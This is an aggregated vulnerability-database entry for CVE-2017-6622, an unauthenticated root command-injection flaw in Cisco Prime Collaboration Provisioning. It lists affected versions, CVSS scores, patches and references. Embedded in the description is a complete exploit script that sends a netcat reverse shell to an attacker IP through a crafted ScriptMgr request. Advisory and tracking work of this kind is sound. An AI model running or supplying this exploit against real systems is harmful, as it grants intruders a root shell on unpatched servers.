Details of VAR-201705-3737

ID

VAR-201705-3737

CVE

CVE-2017-6622

TITLE

Cisco Prime Collaboration Provisioning of Web Vulnerabilities that bypass authentication in the interface

Trust: 0.8

sources: JVNDB: JVNDB-2017-004117

DESCRIPTION

A vulnerability in the web interface for Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to bypass authentication and perform command injection with root privileges. The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases prior to 12.1. Cisco Bug IDs: CSCvc98724. Authentication is not required to exploit this vulnerability.The specific flaw exists within the ScriptMgr servlet, which listens on TCP port 443 by default. A crafted request can bypass authentication for this resource. An attacker can leverage this vulnerability to execute arbitrary code under the context of root. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may lead to further attacks. The software provides IP communications services functionality for IP telephony, voice mail, and unified communications environments. # Usage: ./prime-shell.sh <TARGET-IP> <ATTACKER-IP> <ATTACKER-PORT> function encode() { echo "$1" | perl -MURI::Escape -ne 'chomp;print uri_escape($_),"\n"' } TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$(encode "/bin/bash") COMMAND=$(encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER $PORT >/tmp/f") SCRIPTTEXT="Runtime.getRuntime().exec(new%20String[]{\"$BASH\",\"-c\",\"$COMMAND\"});" curl --head -gk "https://$TARGET/cupm/ScriptMgr?command=compile&language=bsh&script=foo&scripttext=$SCRIPTTEXT"

Trust: 2.79

sources: NVD: CVE-2017-6622 // JVNDB: JVNDB-2017-004117 // ZDI: ZDI-17-445 // BID: 98520 // VULHUB: VHN-114825 // VULMON: CVE-2017-6622 // PACKETSTORM: 144420

AFFECTED PRODUCTS

vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	10.5.1	Trust: 1.9
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	11.1.0	Trust: 1.6
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	10.6.0	Trust: 1.6
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	10.6.2	Trust: 1.6
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	9.0.0	Trust: 1.6
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	10.5.0	Trust: 1.6
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	10.0.0	Trust: 1.6
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	9.5.0	Trust: 1.6
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	11.5.0	Trust: 1.6
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	11.0.0	Trust: 1.6
vendor:	cisco	model:	prime collaboration provisioning	scope:	lt	version:	12.1	Trust: 0.8
vendor:	cisco	model:	prime collaboration provisioning	scope:	-	version:	-	Trust: 0.7
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	9.5	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	9.0	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	11.6	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	11.2	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	11.0	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning sp2	scope:	eq	version:	10.6	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	10.6	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	10.5	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	eq	version:	10.0	Trust: 0.3
vendor:	cisco	model:	prime collaboration provisioning	scope:	ne	version:	12.1	Trust: 0.3

sources: ZDI: ZDI-17-445 // BID: 98520 // JVNDB: JVNDB-2017-004117 // CNNVD: CNNVD-201705-848 // NVD: CVE-2017-6622

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2017-6622
value:	CRITICAL
Trust: 1.0
NVD:	CVE-2017-6622
value:	CRITICAL
Trust: 0.8
ZDI:	CVE-2017-6622
value:	HIGH
Trust: 0.7
CNNVD:	CNNVD-201705-848
value:	CRITICAL
Trust: 0.6
VULHUB:	VHN-114825
value:	HIGH
Trust: 0.1
VULMON:	CVE-2017-6622
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2017-6622
severity:	HIGH
baseScore:	10.0
vectorString:	AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	10.0
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 2.6
VULHUB:	VHN-114825
severity:	HIGH
baseScore:	10.0
vectorString:	AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	10.0
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2017-6622
baseSeverity:	CRITICAL
baseScore:	9.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	3.9
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: ZDI: ZDI-17-445 // VULHUB: VHN-114825 // VULMON: CVE-2017-6622 // JVNDB: JVNDB-2017-004117 // CNNVD: CNNVD-201705-848 // NVD: CVE-2017-6622

PROBLEMTYPE DATA

problemtype:	CWE-264	Trust: 1.9
problemtype:	CWE-862	Trust: 1.1

sources: VULHUB: VHN-114825 // JVNDB: JVNDB-2017-004117 // NVD: CVE-2017-6622

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201705-848

TYPE

permissions and access control issues

Trust: 0.6

sources: CNNVD: CNNVD-201705-848

CONFIGURATIONS

sources: JVNDB: JVNDB-2017-004117

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-114825 // VULMON: CVE-2017-6622

PATCH

title:	cisco-sa-20170517-pcp1	url:	https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1	Trust: 1.5
title:	Cisco Prime Collaboration Provisioning Software Security vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=70379	Trust: 0.6
title:	Cisco: Cisco Prime Collaboration Provisioning Authentication Bypass Vulnerability	url:	https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-20170517-pcp1	Trust: 0.1

sources: ZDI: ZDI-17-445 // VULMON: CVE-2017-6622 // JVNDB: JVNDB-2017-004117 // CNNVD: CNNVD-201705-848

EXTERNAL IDS

db:	NVD	id:	CVE-2017-6622	Trust: 3.7
db:	BID	id:	98520	Trust: 2.1
db:	EXPLOIT-DB	id:	42888	Trust: 1.8
db:	SECTRACK	id:	1038507	Trust: 1.8
db:	JVNDB	id:	JVNDB-2017-004117	Trust: 0.8
db:	ZDI_CAN	id:	ZDI-CAN-4343	Trust: 0.7
db:	ZDI	id:	ZDI-17-445	Trust: 0.7
db:	CNNVD	id:	CNNVD-201705-848	Trust: 0.7
db:	PACKETSTORM	id:	144420	Trust: 0.2
db:	VULHUB	id:	VHN-114825	Trust: 0.1
db:	VULMON	id:	CVE-2017-6622	Trust: 0.1

sources: ZDI: ZDI-17-445 // VULHUB: VHN-114825 // VULMON: CVE-2017-6622 // BID: 98520 // JVNDB: JVNDB-2017-004117 // PACKETSTORM: 144420 // CNNVD: CNNVD-201705-848 // NVD: CVE-2017-6622

REFERENCES

url:	https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20170517-pcp1	Trust: 2.9
url:	http://www.securityfocus.com/bid/98520	Trust: 1.9
url:	https://www.exploit-db.com/exploits/42888/	Trust: 1.9
url:	http://www.securitytracker.com/id/1038507	Trust: 1.8
url:	https://nvd.nist.gov/vuln/detail/cve-2017-6622	Trust: 0.9
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6622	Trust: 0.8
url:	http://www.cisco.com/	Trust: 0.3
url:	https://cwe.mitre.org/data/definitions/862.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://www.tenable.com/plugins/index.php?view=single&id=101531	Trust: 0.1
url:	https://software.cisco.com/download/release.html?mdfid=286308336&softwareid=286289070&release=11.6&flowid=81443	Trust: 0.1
url:	https://cisco.com	Trust: 0.1
url:	https://$target/cupm/scriptmgr?command=compile&language=bsh&script=foo&scripttext=$scripttext"	Trust: 0.1

CREDITS

rgod

Trust: 0.7

sources: ZDI: ZDI-17-445

SOURCES

db:	ZDI	id:	ZDI-17-445
db:	VULHUB	id:	VHN-114825
db:	VULMON	id:	CVE-2017-6622
db:	BID	id:	98520
db:	JVNDB	id:	JVNDB-2017-004117
db:	PACKETSTORM	id:	144420
db:	CNNVD	id:	CNNVD-201705-848
db:	NVD	id:	CVE-2017-6622

LAST UPDATE DATE

2025-04-20T23:16:09.352000+00:00

SOURCES UPDATE DATE

db:	ZDI	id:	ZDI-17-445	date:	2017-06-26T00:00:00
db:	VULHUB	id:	VHN-114825	date:	2019-10-03T00:00:00
db:	VULMON	id:	CVE-2017-6622	date:	2019-10-03T00:00:00
db:	BID	id:	98520	date:	2017-05-17T00:00:00
db:	JVNDB	id:	JVNDB-2017-004117	date:	2017-06-16T00:00:00
db:	CNNVD	id:	CNNVD-201705-848	date:	2019-10-23T00:00:00
db:	NVD	id:	CVE-2017-6622	date:	2025-04-20T01:37:25.860

SOURCES RELEASE DATE

db:	ZDI	id:	ZDI-17-445	date:	2017-06-26T00:00:00
db:	VULHUB	id:	VHN-114825	date:	2017-05-18T00:00:00
db:	VULMON	id:	CVE-2017-6622	date:	2017-05-18T00:00:00
db:	BID	id:	98520	date:	2017-05-17T00:00:00
db:	JVNDB	id:	JVNDB-2017-004117	date:	2017-06-16T00:00:00
db:	PACKETSTORM	id:	144420	date:	2017-09-29T02:22:22
db:	CNNVD	id:	CNNVD-201705-848	date:	2017-05-22T00:00:00
db:	NVD	id:	CVE-2017-6622	date:	2017-05-18T19:29:00.237